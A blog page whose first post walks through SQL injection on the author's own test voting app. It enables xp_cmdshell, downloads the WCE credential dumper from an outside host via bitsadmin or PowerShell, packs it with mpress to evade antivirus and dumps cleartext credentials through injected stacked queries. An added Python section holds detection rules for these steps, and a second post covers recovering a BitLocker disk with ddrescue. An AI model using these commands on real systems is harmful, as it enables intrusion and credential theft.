Monday, September 2, 2013

Get credentials of system through Sql Injection

I was wondering how to get the credentials and rdp into the system through a Sql Injection. To practice the sql injection I have created a test voting application (Asp.net 4.5). It can be downloaded at: https://github.com/ka3hk/web_attacks

Here are the steps to get the credentials through SQLi:

  1. Enable xp_cmdshell
  2. Download WCE onto the machine
  3. Get the IP address
  4. Run WCE as the administrator and send its output to a text file
  5. Read the data from the output file

1. Enable xp_cmdshell

xp_cmdshell allows operating-system command execution on Windows-based SQL Server hosts. It is usually not enabled by default and has to be turned on first, which can be done with this command:

EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

Now we should be able to run commands through SQL. The format is:

execute xp_cmdshell 'command'

Reading the output from xp_cmdshell is slightly tricky. It can be done in three steps:
  • Create a new table (say IIP) with one column and insert the output of xp_cmdshell into it
  • Read the data from the table IIP using a UNION
  • Delete the table IIP
Here is an example of using xp_cmdshell to get the IP address with ipconfig:
  • create table iip(line varchar(2000));insert into iip execute xp_cmdshell 'ipconfig'
  • union select 2,line,'a',2 from iip
  • drop table iip

2. Download WCE onto the machine

WCE (Windows Credential Extractor) is an awesome tool which can be used to dump credentials in clear text. It has to be run as administrator. Most AVs have blacklisted the tool.
I used the mpress packer (UPX should work as well) to pack the executable to avoid detection.


Check this executable for AV. 
Host the executable on an internet site or some other place the SQL server can reach. Use the bitsadmin command line below to download the file; PowerShell can be used as well:

bitsadmin /transfer mydownloadjob  /download /priority normal http://yoursite destination

$webclient = New-Object System.Net.WebClient; $webclient.DownloadFile("source","dest")

3. Get the IP address

Use xp_cmdshell to get the IP address:
execute xp_cmdshell 'ipconfig'

4. Run WCE as admin and output data to a file

WCE should be run as an admin, and it was hard to read the output directly from WCE through SQL, so I sent the output to a file and later read the values from the output file into a table in the database.

WCE command:
C:\temp\wce_mp.exe -w > C:\temp\output.txt

SQL command:
k3';create table iip(line varchar(2000));insert into iip  execute xp_cmdshell 'C:\temp\wce_mp.exe -w > C:\temp\output.txt';--

5. Read data from the file

The data can be read using the Windows type command:
type file.txt

SQL command to read the output:
k3';insert into iip  execute xp_cmdshell 'type C:\temp\output.txt';--
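As an added example that is not part of the original post, here is detection logic a defender could run over captured SQL statement text (for instance from SQL Server Audit or Extended Events) to flag each stage of the chain above: enabling xp_cmdshell, executing it, staging its output in a scratch table, and pulling a file down through it. The sample statements, table and column names, and the candidates table are constructed for the example.

```python
import re

# Constructed sample of captured SQL statement text; the voting table, the
# column names and the injected values are made up for this example.
SAMPLE_STATEMENTS = [
    "SELECT name, votes FROM candidates WHERE id = 'k3'",
    "SELECT name, votes FROM candidates WHERE id = 'k3';EXEC sp_configure "
    "'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;--'",
    "SELECT name, votes FROM candidates WHERE id = 'k3';create table iip(line varchar(2000));"
    "insert into iip execute xp_cmdshell 'ipconfig';--'",
    "SELECT name, votes FROM candidates WHERE id = 'k3';insert into iip execute xp_cmdshell "
    "'bitsadmin /transfer mydownloadjob /download /priority normal http://yoursite C:\\temp\\wce_mp.exe';--'",
    "SELECT name, votes FROM candidates WHERE id = 'k3';insert into iip execute xp_cmdshell "
    "'type C:\\temp\\output.txt';--'",
]

# Each rule maps one stage of the chain described in the post to a pattern.
RULES = [
    ("xp_cmdshell enabled via sp_configure",
     re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1", re.I)),
    ("xp_cmdshell executed",
     re.compile(r"\bexec(?:ute)?\s+(?:master\.\.)?xp_cmdshell\b", re.I)),
    ("command output staged in a scratch table",
     re.compile(r"\binsert\s+into\s+\w+\s+exec(?:ute)?\s+xp_cmdshell", re.I)),
    ("download utility run through xp_cmdshell",
     re.compile(r"xp_cmdshell\s+'[^']*(?:bitsadmin|DownloadFile)", re.I)),
    ("stacked statement closed with a comment marker",
     re.compile(r"';.*;--", re.S)),
]

def classify(statement):
    """Return the names of all rules that match one captured statement."""
    return [name for name, pattern in RULES if pattern.search(statement)]

def triage(statements):
    """Return (index, hits) for every statement that matches at least one rule."""
    findings = []
    for i, stmt in enumerate(statements):
        hits = classify(stmt)
        if hits:
            findings.append((i, hits))
    return findings

if __name__ == "__main__":
    for i, hits in triage(SAMPLE_STATEMENTS):
        print(f"statement {i}: {', '.join(hits)}")
```

The benign first statement produces no hits, while each injected statement is tagged with the stage it belongs to, so a single xp_cmdshell enablement event is enough to start an investigation before the credential dump happens.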

I have created a video for the exploit. 




Sunday, August 25, 2013

Recovering data from a BitLocker-encrypted crashed hard disk


The hard disk of my main machine crashed on 8/9. I had most of my data on this drive, so I now had to recover a crashed BitLocker-encrypted 1TB hard disk.
After a LOT of experimenting and many frustrating hours, I recovered most of the data (I got all the data I cared about).

Here are the steps I took to recover the data:

  1. Remove the crashed hard disk from the machine
  2. DO NOT run TestDisk or Check Disk, or try to unlock the drive through the UI. Any of these actions will damage the hard disk further and reduce the chances of recovering data
  3. Put the hard disk in a ziplock bag and stick it in the freezer for a couple of hours (sounds ridiculous, but it works)
  4. Get a SATA-to-USB cable so that the hard disk can breathe, or cool it with an external fan. I bought this one; it was DOA (dead on arrival) and did not help.
  5. I got a new 3TB hard disk and had to install the Intel Rapid Storage Technology software for Windows to detect any HD > 1TB
  6. Use SystemRescueCd, a live Linux distribution which includes the awesome tool ddrescue
  7. Copy the whole hard disk image onto another working hard disk (mine was a 3TB hard disk). This process takes ~6 hrs because it tries to copy the whole image. At the end of this I had a ~1TB .img file. The command was: ddrescue /corrupted drive /good drive log.txt -r 3 (the number of retries is 3).
  8. Boot back into Windows and use repair-bde to recover the BitLocker data
  9. This takes a couple of hrs and creates another .img file which should have your data.


These blogs helped me out: